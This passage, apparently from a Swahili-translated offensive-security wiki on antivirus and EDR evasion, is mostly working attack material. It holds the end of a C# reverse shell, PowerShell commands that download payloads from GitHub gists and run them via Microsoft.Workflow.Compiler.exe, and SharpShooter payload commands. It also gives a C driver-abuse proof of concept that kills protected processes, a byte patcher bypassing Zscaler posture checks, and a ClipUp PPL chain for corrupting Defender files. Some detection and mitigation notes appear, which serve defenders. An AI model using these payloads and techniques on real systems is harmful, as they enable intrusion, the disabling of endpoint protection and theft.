Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();

while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}

private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();

if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}

}
}

C# using mkusanyaji

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt

REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066

REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639

Kupakua na kutekeleza kiotomatiki:

64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f

Orodha ya obfuscators za C#: https://github.com/NotPrab/.NET-Obfuscator

C++

sudo apt-get install mingw-w64

i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

• https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
• https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
• https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf
• https://github.com/l0ss/Grouper2
• http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
• http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/

Kutumia python kwa mfano wa kujenga injectors:

• https://github.com/cocomelonc/peekaboo

Zana nyingine

# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut:
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan

Zaidi

• https://github.com/Seabreg/Xeexe-TopAntivirusEvasion

Bring Your Own Vulnerable Driver (BYOVD) – Kuondoa AV/EDR kutoka Kernel Space

Storm-2603 ilitumia utility ndogo ya console inayojulikana kama Antivirus Terminator kuzima ulinzi wa endpoint kabla ya kuachia ransomware. Zana hiyo inaleta driver yake dhaifu lakini signed na kuitumia vibaya kutoa operesheni za kernel zenye vibali ambazo hata huduma za AV za Protected-Process-Light (PPL) hazina uwezo wa kuzizuia.

Mambo muhimu kuchukuliwa

1. Signed driver: Faili iliyowekwa kwenye disk ni ServiceMouse.sys, lakini binary ni driver halali aliyesainiwa AToolsKrnl64.sys kutoka Antiy Labs’ “System In-Depth Analysis Toolkit”. Kwa sababu driver ina saini halali ya Microsoft, inaapakuliwa hata wakati Driver-Signature-Enforcement (DSE) imewezeshwa.
2. Service installation:

sc create ServiceMouse type= kernel binPath= "C:\Windows\System32\drivers\ServiceMouse.sys"
sc start  ServiceMouse

Mstari wa kwanza unasajili driver kama kernel service na wa pili unaianzisha ili \\.\ServiceMouse iweze kupatikana kutoka user land. 3. IOCTLs exposed by the driver

Minimal C proof-of-concept:

#include <windows.h>

int main(int argc, char **argv){
DWORD pid = strtoul(argv[1], NULL, 10);
HANDLE hDrv = CreateFileA("\\\\.\\ServiceMouse", GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
DeviceIoControl(hDrv, 0x99000050, &pid, sizeof(pid), NULL, 0, NULL, NULL);
CloseHandle(hDrv);
return 0;
}

4. Why it works: BYOVD hupita kabisa ulinzi wa user-mode; msimbo unaotekelezwa kwenye kernel unaweza kufungua mchakato protected, kuwaua, au kufanyia vitu vya kernel uharibifu bila kuzingatia PPL/PP, ELAM au vipengele vingine vya hardening.

Detection / Mitigation • Wezesha orodha ya kuziba madriver dhaifu ya Microsoft (HVCI, Smart App Control) ili Windows ikatae kuipakia AToolsKrnl64.sys. • Fuatilia uundaji wa kernel services mpya na toa tahadhari wakati driver inapakiwa kutoka kwenye directory inayoweza kuandikwa na kila mtu au haipo kwenye allow-list. • Tazama handles za user-mode kwa custom device objects ikifuatiwa na simu za kushukiwa za DeviceIoControl.

Kupitisha Ukaguzi wa Posture wa Zscaler Client Connector kupitia Patch ya Binary kwenye Disk

Zscaler’s Client Connector inatekeleza sheria za device-posture kwa ndani kwenye mteja na inategemea Windows RPC kuwasilisha matokeo kwa vipengele vingine. Uamuzi mbaya wa muundo uliofanywa mara mbili unafanya bypass kamili kuwa inawezekana:

1. Tathmini ya posture hufanyika kabisa upande wa mteja (boolean inatumwa kwa server).
2. Internal RPC endpoints zinathibitisha tu kwamba executable inayounganisha ime signed by Zscaler (kupitia WinVerifyTrust).

Kwa kufanya patch kwa binaries nne zilizowekwa sahihi kwenye disk njia zote mbili zinaweza kuondolewa:

Minimal patcher excerpt:

pattern = bytes.fromhex("44 89 AC 24 80 02 00 00")
replacement = bytes.fromhex("C6 84 24 80 02 00 00 01")  # force result = 1

with open("ZSATrayManager.exe", "r+b") as f:
data = f.read()
off = data.find(pattern)
if off == -1:
print("pattern not found")
else:
f.seek(off)
f.write(replacement)

Baada ya kubadilisha faili za awali na kuwasha upya service stack:

• Zote ukaguzi wa posture unaonyesha kijani/kuzingatia.
• Binaries zisizotiwa saini au zilizorekebishwa zinaweza kufungua named-pipe RPC endpoints (mfano \\RPC Control\\ZSATrayManager_talk_to_me).
• Host iliyoharibiwa inapata upatikanaji usiozuiliwa kwenye internal network iliyoainishwa na sera za Zscaler.

Somo hili la kesi linaonyesha jinsi maamuzi ya kuaminika upande wa mteja na ukaguzi rahisi wa saini yanavyoweza kushindwa kwa patches za byte chache.

Kutumia vibaya Protected Process Light (PPL) Ili Kudhuru AV/EDR kwa LOLBINs

Protected Process Light (PPL) inatekeleza hierarchy ya signer/level ili mchakato uliolindwa wa kiwango sawa au cha juu tu uweze kuingilia wengine. Kivyovyote, kama unaweza kuanzisha kwa halali binary ienye PPL na kudhibiti argument zake, unaweza kubadilisha kazi zisizo hatari (kwa mfano, logging) kuwa primitive ndogo ya kuandika iliyo salimishwa na PPL dhidi ya saraka zilizo salimishwa zinazotumika na AV/EDR.

Nini kinachofanya mchakato uendeshe kama PPL

• EXE lengwa (na DLLs zozote zilizopakiwa) lazima zisainwe na EKU inayokubali PPL.
• Mchakato lazima uundwe kwa CreateProcess ukitumia flags: EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS.
• Kiwango cha ulinzi kinachofaa lazima kitaombiwe kinacholingana na signer wa binary (kwa mfano, PROTECTION_LEVEL_ANTIMALWARE_LIGHT kwa anti-malware signers, PROTECTION_LEVEL_WINDOWS kwa Windows signers). Viwango visivyofaa vitashindwa wakati wa uundaji.

See also a broader intro to PP/PPL and LSASS protection here:

Windows Credentials Protections

Launcher tooling

• Open-source helper: CreateProcessAsPPL (selects protection level and forwards arguments to the target EXE):
• https://github.com/2x7EQ13/CreateProcessAsPPL
• Mfano wa matumizi:

CreateProcessAsPPL.exe <level 0..4> <path-to-ppl-capable-exe> [args...]
# example: spawn a Windows-signed component at PPL level 1 (Windows)
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe <args>
# example: spawn an anti-malware signed component at level 3
CreateProcessAsPPL.exe 3 <anti-malware-signed-exe> <args>

LOLBIN primitive: ClipUp.exe

• The signed system binary C:\Windows\System32\ClipUp.exe self-spawns and accepts a parameter to write a log file to a caller-specified path.
• When launched as a PPL process, the file write occurs with PPL backing.
• ClipUp cannot parse paths containing spaces; use 8.3 short paths to point into normally protected locations.

8.3 short path helpers

• Orodhesha short names: dir /x katika kila parent directory.
• Tengeneza short path kwenye cmd: for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA

Abuse chain (abstract)

1. Anzisha the PPL-capable LOLBIN (ClipUp) na CREATE_PROTECTED_PROCESS kwa kutumia launcher (mfano: CreateProcessAsPPL).
2. Pasa ClipUp log-path argument ili kulazimisha file creation ndani ya protected AV directory (mfano: Defender Platform). Tumia 8.3 short names ikiwa inahitajika.
3. Ikiwa target binary kwa kawaida iko wazi/imefungwa na AV wakati inakimbia (mfano: MsMpEng.exe), panga the write wakati wa boot kabla AV inaanza kwa kuinstall auto-start service inayokimbia mapema kwa uhakika. Thibitisha boot ordering na Process Monitor (boot logging).
4. Baada ya reboot, the PPL-backed write inatokea kabla AV itakapo lock binaries zake, ikiharibu the target file na kuzuia startup.

Mfano wa invocation (paths zimefichwa/zimefupishwa kwa usalama):

# Run ClipUp as PPL at Windows signer level (1) and point its log to a protected folder using 8.3 names
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe -ppl C:\PROGRA~3\MICROS~1\WINDOW~1\Platform\<ver>\samplew.dll

Notes and constraints

• Huwezi kudhibiti yaliyomo ambayo ClipUp inaandika zaidi ya mahali pa kuweka; primitive inafaa zaidi kwa uharibifu kuliko kwa kuingiza maudhui kwa usahihi.
• Inahitaji local admin/SYSTEM ili kusanidi/kuanza service na dirisha la reboot.
• Muda ni muhimu: lengo halipaswi kuwa wazi; utekelezaji wakati wa boot huzuia kufungwa kwa faili.

Detections

• Uundaji wa mchakato wa ClipUp.exe kwa hoja zisizo za kawaida, hasa ukiwa umeparentwa na launchers zisizo za kawaida, karibu na boot.
• New services zilizowekwa kuanza-auto-start binaries zenye mashaka na kuanza mara kwa mara kabla ya Defender/AV. Chunguza service creation/modification kabla ya Defender startup failures.
• File integrity monitoring kwenye Defender binaries/Platform directories; uundaji/marekebisho ya faili yasiyotegemewa na michakato yenye protected-process flags.
• ETW/EDR telemetry: angalia michakato iliyoundwa kwa CREATE_PROTECTED_PROCESS na matumizi ya kiwango cha PPL isiyo ya kawaida na binaries zisizo za AV.

Mitigations

• WDAC/Code Integrity: zuia ni binaries zipi zilizosainiwa zinaweza kuendesha kama PPL na chini ya wazazi gani; zuia ClipUp invocation nje ya muktadha halali.
• Service hygiene: zuia creation/modification ya auto-start services na fuatilia start-order manipulation.
• Hakikisha Defender tamper protection na early-launch protections ziko enabled; chunguza startup errors zinazoashiria binary corruption.
• Fikiria kuzima 8.3 short-name generation kwenye volumes zinazohifadhi security tooling ikiwa inafaa kwa mazingira yako (test thoroughly).

References for PPL and tooling

• Microsoft Protected Processes overview: https://learn.microsoft.com/windows/win32/procthread/protected-processes
• EKU reference: https://learn.microsoft.com/openspecs/windows_protocols/ms-ppsec/651a90f3-e1f5-4087-8503-40d804429a88
• Procmon boot logging (ordering validation): https://learn.microsoft.com/sysinternals/downloads/procmon
• CreateProcessAsPPL launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
• Technique writeup (ClipUp + PPL + boot-order tamper): https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html

Marejeleo

• Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer
• Synacktiv – Should you trust your zero trust? Bypassing Zscaler posture checks
• Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations
• Hexacorn – DLL ForwardSideLoading: Abusing Forwarded Exports
• Windows 11 Forwarded Exports Inventory (apis_fwd.txt)
• Microsoft Docs – Known DLLs
• Microsoft – Protected Processes
• Microsoft – EKU reference (MS-PPSEC)
• Sysinternals – Process Monitor
• CreateProcessAsPPL launcher
• Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)